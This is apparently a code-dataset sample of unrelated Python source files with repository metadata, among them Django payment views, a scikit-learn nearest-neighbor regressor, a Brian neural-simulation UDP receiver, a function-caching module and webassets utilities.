def add_versioned_package(self, versioned):
try:
            self.__packages[versioned.name].add_single(versioned.version, versioned.architecture)
except KeyError:
arch_and_versions = ArchAndVersions()
arch_and_versions.add_single(versioned.version, versioned.architecture)
self.__packages[versioned.name] = arch_and_versions
def export_to_xml(self, file):
root = etree.Element("enclosure")
for pkg, arch_and_versions in sorted(self.__packages.items(), key=lambda x: x[0]):
if arch_and_versions.isevery and arch_and_versions.every.isevery:
etree.SubElement(root, "fullpackage", name=pkg)
else:
package_element = etree.SubElement(root, "package", name=pkg)
if arch_and_versions.isevery:
everyarch_element = etree.SubElement(package_element, "everyarch")
for version in sorted(arch_and_versions.every):
etree.SubElement(everyarch_element, "version", number=version)
else:
for arch, versions in sorted(arch_and_versions, key=lambda x: x[0]):
arch_element = etree.SubElement(package_element, "arch", name=arch)
if versions.isevery:
etree.SubElement(arch_element, "everyversion")
else:
for version in sorted(versions):
etree.SubElement(arch_element, "version", number=version)
tree = etree.ElementTree(root)
tree.write(file, pretty_print=True, encoding="UTF-8", xml_declaration=True)
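    # Illustrative round-trip (not part of the original module):
    #
    #   enc = Enclosure()
    #   av = ArchAndVersions()
    #   av.add_single("1.0-1", "amd64")
    #   enc.add_package("hello", av)
    #   with open("enclosure.xml", "wb") as f:
    #       enc.export_to_xml(f)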
def import_from_xml(self, file):
try:
root = etree.parse(file).getroot()
self.clear()
for fullpackage_element in root.findall("fullpackage"):
arch_and_versions = ArchAndVersions(isevery=True)
arch_and_versions.every = Versions(isevery=True)
self.add_package(fullpackage_element.get("name"), arch_and_versions)
for package_element in root.findall("package"):
everyarch_element = package_element.find("everyarch")
if everyarch_element is not None:
arch_and_versions = ArchAndVersions(isevery=True)
everyversion_element = everyarch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.every = Versions(isevery=True)
else:
versions = Versions()
for version_element in everyarch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions)
else:
arch_and_versions = ArchAndVersions()
for arch_element in package_element.findall("arch"):
everyversion_element = arch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.add(Versions(isevery=True), arch_element.get("name"))
else:
versions = Versions()
for version_element in arch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions, arch_element.get("name"))
self.add_package(package_element.get("name"), arch_and_versions)
except (ValueError, LookupError, etree.XMLSyntaxError) as err:
            raise EnclosureImportSyntaxError('''Syntax error occurred during importing
|
googleapis/python-dialogflow
|
samples/generated_samples/dialogflow_v2_generated_conversation_datasets_delete_conversation_dataset_sync.py
|
Python
|
apache-2.0
| 1,640 | 0.001829 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
|
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteConversationDataset
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
from google.cloud import dialogflow_v2
def sample_delete_conversation_dataset():
# Create a client
client = dialogflow_v2.ConversationDatasetsClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteConversationDatasetRequest(
name="name_value",
)
# Make the request
operation = client.delete_conversation_dataset(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
|
qilicun/python
|
python2/PyMOTW-1.132/PyMOTW/EasyDialogs/EasyDialogs_AskYesNoCancel.py
|
Python
|
gpl-3.0
| 390 | 0.012821 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import EasyDialogs
valid_responses = { 1:'yes',
0:'no',
-1:'cancel',
}
response = EasyDialogs.AskYesNoCancel('Select an option')
print 'You selected:', valid_responses[response]
|
we-inc/mms-snow-white-and-the-seven-pandas
|
webserver/apps/payments/views.py
|
Python
|
mit
| 3,518 | 0.002558 |
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets, mixins
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from rest_framework.decorators import api_view, permission_classes
from apps.payments.models import Installment, RentalPaymentInfo
from apps.markets.models import Market
from apps.booths.models import Booth
from apps.payments.serializers import InstallmentSerializer, UploadReceiptSerializer, VerifyReceiptSerializer
class PaymentViewSet(viewsets.GenericViewSet, mixins.CreateModelMixin):
"""
### Pay with bank account
{\n
"payment_type": 1,
"market": 1,
"payment_method": 2,
"amount": 2000
}
### Pay with credit card
{\n
"payment_type": 1,
"market": 1,
"payment_method": 1,
"amount": 2000,
"credit_card": 1
}
### Pay with new credit card
{\n
"payment_type": 1,
"market": 1,
"new_credit_card": {
"card_number": "123456789",
"card_holder_name": "Bee",
"type": 1,
"expiry_date": "2020-07-01",
"verification_no": "123"
},
"save_new_credit_card": true,
"payment_method": 1,
"amount": 2000
}
"""
queryset = Installment.objects.all()
serializer_class = InstallmentSerializer
permission_classes = (IsAuthenticated,)
class UploadReceiptViewSet(viewsets.GenericViewSet, mixins.RetrieveModelMixin, mixins.UpdateModelMixin):
queryset = Installment.objects.all()
serializer_class = UploadReceiptSerializer
permission_classes = (IsAuthenticated,)
class VerifyReceiptViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.RetrieveModelMixin,
mixins.UpdateModelMixin):
queryset = Installment.objects.filter(payment_method=Installment.BANK_TRANSFER,
verification_status=Installment.PENDING)
serializer_class = VerifyReceiptSerializer
permission_classes = (IsAuthenticated, IsAdminUser)
@api_view(['GET', ])
@permission_classes((IsAuthenticated, ))
def get_payment_status(request, *args, **kwargs):
market_id = kwargs.get('pk', None)
market = Market.objects.filter(pk=market_id)
if len(market) == 0:
return Response('Market does not exist', status=status.HTTP_400_BAD_REQUEST)
booths = Booth.objects.filter(market=market)
response = []
for booth in booths:
payment_info = dict()
payment_info['booth_id'] = booth.pk
payment_info['booth_number'] = booth.booth_number
approved_reservations = booth.approved_reservations.all()
if len(approved_reservations) != 0:
approved_reservation = approved_reservations[0]
try:
rental_payment_info = approved_reservation.rental_payment_info
payment_info['payment_status'] = rental_payment_info.status
payment_info['vendor_id'] = rental_payment_info.user.id
payment_info['vendor_name'] = rental_payment_info.user.first_name + ' ' + rental_payment_info.user.last_name
except:
payment_info['payment_status'] = 0
payment_info['vendor_id'] = approved_reservation.user.id
payment_info['vendor_name'] = approved_reservation.user.first_name + ' ' + approved_reservation.user.last_name
response.append(payment_info)
return Response(response, status=status.HTTP_200_OK)
|
ricardodeazambuja/BrianConnectUDP
|
examples/OutputNeuronGroup_brian.py
|
Python
|
cc0-1.0
| 2,857 | 0.014351 |
'''
Example of a spike receiver (only receives spikes)
In this example spikes are received and processed creating a raster plot at the end of the simulation.
'''
from brian import *
import numpy
from brian_multiprocess_udp import BrianConnectUDP
# The main function with the NeuronGroup(s) and Synapse(s) must be named "main_NeuronGroup".
# It will receive two objects: input_Neuron_Group and the simulation_clock. The input_Neuron_Group
# will supply the input spikes to the network. The size of the spike train received equals NumOfNeuronsInput.
# The size of the output spike train equals NumOfNeuronsOutput and must be the same size of the NeuronGroup who is
# going to interface with the rest of the system to send spikes.
# The function must return all the NeuronGroup objects and all the Synapse objects this way:
# ([list of all NeuronGroups],[list of all Synapses])
# and the FIRST (index 0) NeuronGroup of the list MUST be the one where the OUTPUT spikes will be taken by the simulation.
#
# Here is also possible to use "dummy" NeuronGroups only to receive and/or send spikes.
my_neuron_input_number = 100
def main_NeuronGroup(input_Neuron_Group, simulation_clock):
print "main_NeuronGroup!" #DEBUG!
simclock = simulation_clock
Nr=NeuronGroup(my_neuron_input_number, model='v:1', reset=0, threshold=0.5, clock=simclock)
Nr.v=0
# SYNAPSES BETWEEN REAL NEURON NETWORK AND THE INPUT
Syn_iNG_Nr=Synapses(input_Neuron_Group, Nr, model='w:1', pre='v+=w', clock=simclock)
Syn_iNG_Nr[:,:]='i==j'
print "Total Number of Synapses:", len(Syn_iNG_Nr) #DEBUG!
Syn_iNG_Nr.w=1
MExt=SpikeMonitor(Nr) # Spikes sent by UDP
Mdummy=SpikeMonitor(input_Neuron_Group) # Spikes received by UDP
return ([Nr],[Syn_iNG_Nr],[MExt,Mdummy])
def post_simulation_function(input_NG, simulation_NG, simulation_SYN, simulation_MN):
"""
input_NG: the neuron group that receives the input spikes
simulation_NG: the neuron groups list passed to the system by the user function (main_NeuronGroup)
simulation_SYN: the synapses list passed to the system by the user function (main_NeuronGroup)
simulation_MN: the monitors list passed to the system by the user function (main_NeuronGroup)
This way it is possible to plot, save or do whatever you want with these objects after the end of the simulation!
"""
pass
figure()
raster_plot(simulation_MN[1])
title("Spikes Received by UDP")
show(block=True)
# savefig('output.pdf')
if __name__=="__main__":
my_simulation = BrianConnectUDP(main_NeuronGroup, NumOfNeuronsInput=my_neuron_input_number, post_simulation_function=post_simulation_function,
input_addresses=[("127.0.0.1", 18181, my_neuron_input_number)], simclock_dt=1, inputclock_dt=2, TotalSimulationTime=10000, sim_repetitions=0, brian_address=2)
|
dp0h/marketdata
|
marketdata/update.py
|
Python
|
mit
| 1,099 | 0.00364 |
# coding:utf-8
'''
Market data update functionality
'''
from __future__ import print_function
from datetime import datetime, timedelta
from symbols import Symbols
import yahoo
def update_marketdata(from_date=None, to_date=None, sym=Symbols()):
'''
Fetch latest market data and upate it in db
'''
for s in sym.symbols():
if not from_date:
from_date = datetime.now() - timedelta(days=10*365) # fetch market data for 10 years
if not to_date:
to_date = datetime.now() + timedelta(days=2) # use a future date since there might be issues with timezones
date = sym.last_date(s)
fdate = date + timedelta(days=1) if date is not None else from_date
(res, data) = yahoo.fetch_market_data(s, fdate, to_date)
if res:
            sym.insert_historical_prices(s, [(x[0], x[1], x[2], x[3], x[4], x[5], x[6]) for x in data])
else:
            # There are several reasons update can fail: 1. No new data; 2. wrong symbol; 3. Other reason.
print('Failed updating symbol %s' % s)
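# Illustrative use (assumes a populated Symbols() store and network access):
#
#   if __name__ == '__main__':
#       update_marketdata()   # fetches up to 10 years of history per symbol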
|
charmoniumQ/EDGAR-research
|
edgar_code/cache.py
|
Python
|
mit
| 9,951 | 0.001306 |
from __future__ import annotations
import abc
import shutil
import functools
from pathlib import Path
import urllib.parse
from typing import (
Callable, Any, TypeVar, cast, Tuple, Dict, Optional,
Union, Hashable,
)
import logging
from edgar_code.types import PathLike, Serializer, UserDict
from edgar_code.util.picklable_threading import RLock
logger = logging.getLogger(__name__)
CacheKey = TypeVar('CacheKey')
CacheReturn = TypeVar('CacheReturn')
CacheFunc = TypeVar('CacheFunc', bound=Callable[..., Any])
class Cache:
@classmethod
def decor(
cls,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
hit_msg: bool = False, miss_msg: bool = False, suffix: str = '',
) -> Callable[[CacheFunc], CacheFunc]:
'''Decorator that creates a cached function
>>> @Cache.decor(ObjectStore())
>>> def foo():
... pass
'''
def decor_(function: CacheFunc) -> CacheFunc:
return cast(
CacheFunc,
functools.wraps(function)(
cls(obj_store, function, hit_msg, miss_msg, suffix)
)
)
return decor_
disabled: bool
#pylint: disable=too-many-arguments
def __init__(
self,
obj_store: Callable[[str], ObjectStore[CacheKey, CacheReturn]],
function: CacheFunc,
hit_msg: bool = False, miss_msg: bool = False, suffix: str = ''
) -> None:
'''Cache a function.
Note this uses `function.__qualname__` to determine the file
name. If this is not unique within your program, define
suffix.
Note this uses `function.version` when defined, so objects of
the same functions of different versions will not collide.
'''
self.function = function
self.name = '-'.join(filter(bool, [
self.function.__qualname__,
suffix,
getattr(self.function, 'version', ''),
]))
self.obj_store = obj_store(self.name)
self.hit_msg = hit_msg
self.miss_msg = miss_msg
self.sem = RLock()
self.__qualname__ = f'Cache({self.name})'
self.disabled = False
def __call__(self, *pos_args: Any, **kwargs: Any) -> Any:
if self.disabled:
return self.function(*pos_args, **kwargs)
else:
with self.sem:
args_key = self.obj_store.args2key(pos_args, kwargs)
if args_key in self.obj_store:
if self.hit_msg:
logger.info('hit %s with %s, %s',
self.name, pos_args, kwargs)
res = self.obj_store[args_key]
else:
if self.miss_msg:
logger.info('miss %s with %s, %s',
self.name, pos_args, kwargs)
res = self.function(*pos_args, **kwargs)
self.obj_store[args_key] = res
return res
def clear(self) -> None:
'''Removes all cached items'''
self.obj_store.clear()
def __str__(self) -> str:
store_type = type(self.obj_store).__name__
return f'Cache of {self.name} with {store_type}'
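# Illustrative usage sketch (assumes a writable ./cache directory; FileStore is
# defined further below in this module):
#
#   @Cache.decor(FileStore.create('./cache'))
#   def expensive(x):
#       return x * x
#
# The first call computes and persists the result under
# ./cache/expensive_cache.pickle; later calls with the same arguments are
# served from the store.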
ObjectStoreKey = TypeVar('ObjectStoreKey')
ObjectStoreValue = TypeVar('ObjectStoreValue')
class ObjectStore(UserDict[ObjectStoreKey, ObjectStoreValue], abc.ABC):
@classmethod
def create(
cls, *args: Any, **kwargs: Any
) -> Callable[[str], ObjectStore[ObjectStoreKey, ObjectStoreValue]]:
'''Curried init. Name will be applied later.'''
@functools.wraps(cls)
def create_(name: str) -> ObjectStore[ObjectStoreKey, ObjectStoreValue]:
return cls(*args, name=name, **kwargs) # type: ignore
return create_
def __init__(self, name: str) -> None:
super().__init__()
self.name = name
@abc.abstractmethod
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> ObjectStoreKey:
# pylint: disable=unused-argument,no-self-use
...
class MemoryStore(ObjectStore[Hashable, Any]):
def __init__(self, name: str):
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
class FileStore(MemoryStore):
'''An obj_store that persists at ./${CACHE_PATH}/${FUNCTION_NAME}_cache.pickle'''
def __init__(
self, cache_path: PathLike, name: str, serializer: Optional[Serializer] = None,
):
# pylint: disable=non-parent-init-called,super-init-not-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(cache_path) / (self.name + '_cache.pickle')
self.loaded = False
self.data = {}
def load_if_not_loaded(self) -> None:
if not self.loaded:
self.loaded = True
if self.cache_path.exists():
with self.cache_path.open('rb') as fil:
self.data = self.serializer.load(fil)
else:
self.cache_path.parent.mkdir(parents=True, exist_ok=True)
self.data = {}
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> Hashable:
# pylint: disable=no-self-use
return to_hashable((args, kwargs))
def commit(self) -> None:
self.load_if_not_loaded()
if self.data:
with self.cache_path.open('wb') as fil:
self.serializer.dump(self.data, fil)
else:
|
if self.cache_path.exists():
print('deleting ', self.cache_path)
self.cache_path.unlink()
def __setitem__(self, key: Hashable, obj: Any) -> None:
self.load_if_not_loaded()
super().__setitem__(key, obj)
self.commit()
def __delitem__(self, key: Hashable) -> None:
self.load_if_not_loaded()
super().__delitem__(key)
self.commit()
    def clear(self) -> None:
self.load_if_not_loaded()
super().clear()
self.commit()
class DirectoryStore(ObjectStore[PathLike, Any]):
'''Stores objects at ./${CACHE_PATH}/${FUNCTION_NAME}/${urlencode(args)}.pickle'''
def __init__(
self, object_path: PathLike, name: str,
serializer: Optional[Serializer] = None
) -> None:
# pylint: disable=non-parent-init-called
ObjectStore.__init__(self, name)
if serializer is None:
import pickle
self.serializer = cast(Serializer, pickle)
else:
self.serializer = serializer
self.cache_path = pathify(object_path) / self.name
def args2key(self, args: Tuple[Any, ...], kwargs: Dict[str, Any]) -> PathLike:
if kwargs:
args = args + (kwargs,)
fname = urllib.parse.quote(f'{safe_str(args)}.pickle', safe='')
return self.cache_path / fname
def __setitem__(self, path: PathLike, obj: Any) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
with path.open('wb') as fil:
self.serializer.dump(obj, fil)
def __delitem__(self, path: PathLike) -> None:
path.unlink()
def __getitem__(self, path: PathLike) -> Any:
with path.open('rb') as fil:
return self.serializer.load(fil)
def __contains__(self, path: Any) -> bool:
if hasattr(path, 'exists'):
return bool(path.exists())
else:
return False
def clear(self) -> None:
print('deleting')
if hasattr(self.cache_path, 'rmtree'):
cast(Any, self.cache_path).rmtree()
else:
shutil.rmtree(str(self.cache_path))
def to_hashable(obj: Any) -> Hashable:
'''Converts args and kwargs into a hashable type (overridable)
|
marplaa/SerialBus
|
python_lib/test_script/echo.py
|
Python
|
gpl-3.0
| 294 | 0.010204 |
from SerialBus import SerialBus
serialbus = SerialBus(baud = 19200, serialnum="ABCD")
while True:
cmd = input('Send: ')
answer = serialbus.send_request_wait(10, bytes(cmd, 'ascii'))
answer_str = "";
for char in answer:
        answer_str += (chr(char))
print(answer_str)
|
mbayon/TFG-MachineLearning
|
venv/lib/python3.6/site-packages/sklearn/neighbors/regression.py
|
Python
|
mit
| 10,967 | 0 |
"""Nearest Neighbor Regression"""
# Authors: Jake Vanderplas <vanderplas@astro.washington.edu>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <a.joly@ulg.ac.be>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from .base import _get_weights, _check_weights, NeighborsBase, KNeighborsMixin
from .base import RadiusNeighborsMixin, SupervisedFloatMixin
from ..base import RegressorMixin
from ..utils import check_array
class KNeighborsRegressor(NeighborsBase, KNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on k-nearest neighbors.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter
|
for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : string or callable, default 'minkowski'
the distance metric to use for the tree. The default metric is
        minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of the DistanceMetric class for a
list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int, optional (default = 1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Examples
--------
>>> X = [[0], [1], [2], [3]]
>>> y = [0, 0, 1, 1]
>>> from sklearn.neighbors import KNeighborsRegressor
>>> neigh = KNeighborsRegressor(n_neighbors=2)
>>> neigh.fit(X, y) # doctest: +ELLIPSIS
KNeighborsRegressor(...)
>>> print(neigh.predict([[1.5]]))
[ 0.5]
See also
--------
NearestNeighbors
RadiusNeighborsRegressor
KNeighborsClassifier
RadiusNeighborsClassifier
Notes
-----
See :ref:`Nearest Neighbors <neighbors>` in the online documentation
for a discussion of the choice of ``algorithm`` and ``leaf_size``.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances but
different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, weights='uniform',
algorithm='auto', leaf_size=30,
p=2, metric='minkowski', metric_params=None, n_jobs=1,
**kwargs):
self._init_params(n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size, metric=metric, p=p,
metric_params=metric_params, n_jobs=n_jobs, **kwargs)
self.weights = _check_weights(weights)
def predict(self, X):
"""Predict the target for the provided data
Parameters
----------
X : array-like, shape (n_query, n_features), \
or (n_query, n_indexed) if metric == 'precomputed'
Test samples.
Returns
-------
y : array of int, shape = [n_samples] or [n_samples, n_outputs]
Target values
"""
X = check_array(X, accept_sparse='csr')
neigh_dist, neigh_ind = self.kneighbors(X)
weights = _get_weights(neigh_dist, self.weights)
_y = self._y
if _y.ndim == 1:
_y = _y.reshape((-1, 1))
if weights is None:
y_pred = np.mean(_y[neigh_ind], axis=1)
else:
y_pred = np.empty((X.shape[0], _y.shape[1]), dtype=np.float64)
denom = np.sum(weights, axis=1)
for j in range(_y.shape[1]):
num = np.sum(_y[neigh_ind, j] * weights, axis=1)
y_pred[:, j] = num / denom
if self._y.ndim == 1:
y_pred = y_pred.ravel()
return y_pred
class RadiusNeighborsRegressor(NeighborsBase, RadiusNeighborsMixin,
SupervisedFloatMixin,
RegressorMixin):
"""Regression based on neighbors within a fixed radius.
The target is predicted by local interpolation of the targets
associated of the nearest neighbors in the training set.
Read more in the :ref:`User Guide <regression>`.
Parameters
----------
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : integer, optional (default = 2)
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance
0x1997/webassets | src/webassets/utils.py | Python | bsd-2-clause | 6,584 | 0.001367 |
from webassets import six
import contextlib
import os
import sys
from itertools import takewhile
from .exceptions import BundleError
__all__ = ('md5_constructor', 'pickle', 'set', 'StringIO',
'common_path_prefix', 'working_directory')
if sys.version_info >= (2, 5):
import hashlib
md5_constructor = hashlib.md5
else:
import md5
md5_constructor = md5.new
try:
import cPickle as pickle
except ImportError:
import pickle
try:
set
except NameError:
from sets import Set as set
else:
set = set
from webassets.six import StringIO
try:
from urllib import parse as urlparse
except ImportError: # Python 2
import urlparse
import urllib
def common_path_prefix(paths, sep=os.path.sep):
"""os.path.commonpath() is completely in the wrong place; it's
useless with paths since it only looks at one character at a time,
see http://bugs.python.org/issue10395
This replacement is from:
http://rosettacode.org/wiki/Find_Common_Directory_Path#Python
"""
def allnamesequal(name):
return all(n==name[0] for n in name[1:])
bydirectorylevels = zip(*[p.split(sep) for p in paths])
return sep.join(x[0] for x in takewhile(allnamesequal, bydirectorylevels))
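# Editorial usage sketch -- not part of the original webassets source. The
# paths are invented; sep='/' keeps the example platform-independent.
def _example_common_path_prefix():
    paths = ['/srv/app/static/css/site.css', '/srv/app/static/js/app.js']
    assert common_path_prefix(paths, sep='/') == '/srv/app/static'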
@contextlib.contextmanager
def working_directory(directory=None, filename=None):
"""A context manager which changes the working directory to the given
path, and then changes it back to its previous value on exit.
Filters will often find this helpful.
Instead of a ``directory``, you may also give a ``filename``, and the
    working directory will be set to the directory that file is in.
"""
assert bool(directory) != bool(filename) # xor
if not directory:
directory = os.path.dirname(filename)
prev_cwd = os.getcwd()
os.chdir(directory)
try:
yield
finally:
os.chdir(prev_cwd)
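# Editorial usage sketch -- not part of the original webassets source. It
# shows the context manager restoring the previous working directory.
def _example_working_directory():
    before = os.getcwd()
    with working_directory(directory=os.path.dirname(__file__) or '.'):
        pass  # cwd temporarily points at the directory containing this module
    assert os.getcwd() == before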
def make_option_resolver(clazz=None, attribute=None, classes=None,
allow_none=True, desc=None):
"""Returns a function which can resolve an option to an object.
The option may given as an instance or a class (of ``clazz``, or
duck-typed with an attribute ``attribute``), or a string value referring
to a class as defined by the registry in ``classes``.
    This supports arguments, so an option may look like this:
cache:/tmp/cachedir
If this must instantiate a class, it will pass such an argument along,
if given. In addition, if the class to be instantiated has a classmethod
``make()``, this method will be used as a factory, and will be given an
Environment object (if one has been passed to the resolver). This allows
classes that need it to initialize themselves based on an Environment.
"""
assert clazz or attribute or classes
    desc_string = ' to %s' % desc if desc else ''
def instantiate(clazz, env, *a, **kw):
# Create an instance of clazz, via the Factory if one is defined,
# passing along the Environment, or creating the class directly.
if hasattr(clazz, 'make'):
# make() protocol is that if e.g. the get_manifest() resolver takes
# an env, then the first argument of the factory is the env.
args = (env,) + a if env is not None else a
return clazz.make(*args, **kw)
return clazz(*a, **kw)
def resolve_option(option, env=None):
the_clazz = clazz() if callable(clazz) and not isinstance(option, type) else clazz
if not option and allow_none:
return None
# If the value has one of the support attributes (duck-typing).
if attribute and hasattr(option, attribute):
if isinstance(option, type):
return instantiate(option, env)
return option
# If it is the class we support.
if the_clazz and isinstance(option, the_clazz):
return option
elif isinstance(option, type) and issubclass(option, the_clazz):
return instantiate(option, env)
# If it is a string
elif isinstance(option, six.string_types):
parts = option.split(':', 1)
key = parts[0]
arg = parts[1] if len(parts) > 1 else None
if key in classes:
return instantiate(classes[key], env, *([arg] if arg else []))
raise ValueError('%s cannot be resolved%s' % (option, desc_string))
resolve_option.__doc__ = """Resolve ``option``%s.""" % desc_string
return resolve_option
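# Editorial usage sketch -- not part of the original webassets source.
# FakeCache and the 'memory' registry key are invented for illustration; the
# lazy ``lambda: FakeCache`` mirrors how webassets usually passes ``clazz``.
def _example_make_option_resolver():
    class FakeCache(object):
        def __init__(self, directory=None):
            self.directory = directory
    resolve_cache = make_option_resolver(
        clazz=lambda: FakeCache, classes={'memory': FakeCache}, desc='a cache')
    assert resolve_cache(None) is None                     # allow_none=True
    cache = resolve_cache('memory:/tmp/assets-cache')      # 'key:argument' form
    assert isinstance(cache, FakeCache)
    assert cache.directory == '/tmp/assets-cache'
    instance = FakeCache()
    assert resolve_cache(instance) is instance             # instances pass through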
def RegistryMetaclass(clazz=None, attribute=None, allow_none=True, desc=None):
"""Returns a metaclass which will keep a registry of all subclasses, keyed
by their ``id`` attribute.
The metaclass will also have a ``resolve`` method which can turn a string
into an instance of one of the classes (based on ``make_option_resolver``).
"""
def eq(self, other):
"""Return equality with config values that instantiate this."""
return (hasattr(self, 'id') and self.id == other) or\
id(self) == id(other)
def unicode(self):
return "%s" % (self.id if h
|
asattr(self, 'id') else repr(self))
class Metaclass(type):
REGISTRY = {}
def __new__(mcs, name, bases, attrs):
if not '__eq__' in attrs:
                attrs['__eq__'] = eq
if not '__unicode__' in attrs:
attrs['__unicode__'] = unicode
if not '__str__' in attrs:
attrs['__str__'] = unicode
new_klass = type.__new__(mcs, name, bases, attrs)
if hasattr(new_klass, 'id'):
mcs.REGISTRY[new_klass.id] = new_klass
return new_klass
resolve = staticmethod(make_option_resolver(
clazz=clazz,
attribute=attribute,
allow_none=allow_none,
desc=desc,
classes=REGISTRY
))
return Metaclass
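# Editorial usage sketch -- not part of the original webassets source. Thing,
# DemoThing and the 'demo' id are invented; the sketch shows subclasses being
# registered by ``id`` and resolved back from a string.
def _example_registry_metaclass():
    Meta = RegistryMetaclass(clazz=lambda: Thing, desc='a demo strategy')
    Thing = Meta('Thing', (object,), {})                 # base class, no id
    DemoThing = Meta('DemoThing', (Thing,), {'id': 'demo'})
    assert Meta.REGISTRY['demo'] is DemoThing
    assert isinstance(Meta.resolve('demo'), DemoThing)   # string id -> instance
    assert DemoThing() == 'demo'                         # __eq__ falls back to id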
def cmp_debug_levels(level1, level2):
"""cmp() for debug levels, returns True if ``level1`` is higher
than ``level2``."""
level_ints = {False: 0, 'merge': 1, True: 2}
try:
        cmp = lambda a, b: (a > b) - (a < b)  # the builtin cmp() is gone in Python 3
return cmp(level_ints[level1], level_ints[level2])
except KeyError as e:
# Not sure if a dependency on BundleError is proper here. Validating
# debug values should probably be done on assign. But because this
# needs to happen in two places (Environment and Bundle) we do it here.
raise BundleError('Invalid debug value: %s' % e)
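# Editorial usage sketch -- not part of the original webassets source:
# the three debug levels order as False < 'merge' < True.
def _example_cmp_debug_levels():
    assert cmp_debug_levels(True, 'merge') > 0
    assert cmp_debug_levels(False, False) == 0
    assert cmp_debug_levels(False, 'merge') < 0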
linkedin/WhereHows | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | Python | apache-2.0 | 7,798 | 0.002949 |
import json
import pathlib
from unittest.mock import patch
from freezegun import freeze_time
from datahub.ingestion.run.pipeline import Pipeline
from datahub.ingestion.source.identity.azure_ad import AzureADConfig
from tests.test_helpers import mce_helpers
